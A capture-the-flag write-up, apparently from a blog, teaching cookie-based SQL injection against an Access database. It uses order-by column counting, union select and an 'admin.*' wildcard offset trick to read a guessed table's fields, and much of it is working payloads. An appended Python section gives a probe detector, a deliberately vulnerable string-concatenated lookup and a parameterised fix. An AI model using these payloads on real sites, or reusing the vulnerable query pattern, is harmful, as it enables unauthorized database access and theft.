ACCESS offset injection

Offset injection (the technique also applies to other databases)

Principle: During SQL injection you will sometimes run into a situation where the column names cannot be queried, for example because there is no permission to read the database's own system tables. When you have guessed the table name but cannot guess the field names, offset injection lets you read the data in that table anyway: table_name.* is used in the select list, and because it is a wildcard it expands to every column of that table. There is a length constraint, though: if the injectable query has fewer columns than the target table, the wildcard cannot fit and the technique cannot be used.

First challenge:

We first check whether the GET parameter in the URL bar is injectable.
[screenshot] It is not, so we try cookie injection instead.
[screenshot] Press F12 to open the console, delete the GET parameter from the URL bar, and enter the following in the console:

document.cookie="id="+escape("171")

It is executed, so we go on to check the number of columns:
[screenshot]

document.cookie="id="+escape("171 order by 10")

But with

document.cookie="id="+escape("171 order by 11")

no data is returned, so the query has 10 columns.
Next we enter:

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

[screenshot] The output points are 2, 7, 8 and 9.
We then brute-force the table name
[screenshot] and obtain the table name admin,
but the field names cannot be obtained one by one, so we look at other pages of the site for one with more columns. There is a page with 26 columns:

document.cookie="id="+escape("105 order by 26")

[screenshot] Enter:

document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin")

[screenshot] The output points are 3, 5 and 7.
Now substitute admin.* for the trailing literal columns, reducing the number of literals until the query succeeds:

document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin")

document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin")

[screenshot] The query with 10 literal columns succeeds, so admin has 16 fields (10 + 16 = 26).
Since the output points are 3, 5 and 7, we move admin.* to position 3:

document.cookie="id="+escape("105 union select 1,2,admin.*,4,5,6,7,8,9,10,11 from admin")

[screenshot] However, only the first 7 fields could be displayed and the later ones could not be read. None of the first 7 contained a flag, so we check the HTML source for a hidden output point.
[screenshot] Sure enough, there is one. We then go through the remaining fields one by one to see whether any of them holds the flag,
and find it.
[screenshot]
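The cookie-driven query pattern this write-up exploits, shown beside a parameterised version and a small detector for the probe strings used above. This is an added example, not code from the original post or the target site; the `news`/`admin` table layout, column names and sample cookie values are constructed assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample cookie values: probes from the write-up, as escape() encodes them.
SAMPLE_COOKIES = [
    "171",
    "171%20order%20by%2010",
    "171%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin",
    "105%20union%20select%201,2,admin.*,4,5,6,7,8,9,10,11%20from%20admin",
]

# Signatures of the three steps the write-up walks through.
PROBE_PATTERNS = [
    (re.compile(r"\border\s+by\s+\d+", re.I), "order-by column-count probe"),
    (re.compile(r"\bunion\s+select\b", re.I), "union-based injection"),
    (re.compile(r"\b\w+\.\*\s*(,|from\b)", re.I), "wildcard (offset) injection"),
]

def classify_cookie(raw):
    """Decode the cookie as the server would and list the probe patterns it matches."""
    value = unquote(raw)
    return [label for pattern, label in PROBE_PATTERNS if pattern.search(value)]

def make_db():
    """Constructed in-memory stand-in for the site; the table layout is hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (171, 'hello', 'public article');
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'placeholder-secret');
    """)
    return conn

def vulnerable_lookup(conn, cookie_id):
    """The pattern the write-up exploits: the decoded cookie is pasted into the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE id=" + unquote(cookie_id)
    return conn.execute(sql).fetchall()

def hardened_lookup(conn, cookie_id):
    """Fix: require a plain integer and bind it as a parameter, never as SQL text."""
    value = unquote(cookie_id)
    if not re.fullmatch(r"\d+", value):
        raise ValueError("id cookie must be a plain integer")
    return conn.execute("SELECT id, title, body FROM news WHERE id=?", (int(value),)).fetchall()
```

Running `classify_cookie` over the `Cookie` header of each request is enough to flag the order-by and union probes before they reach the database; the hardened lookup rejects them outright.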

Origin blog.csdn.net/weixin_43264067/article/details/106091146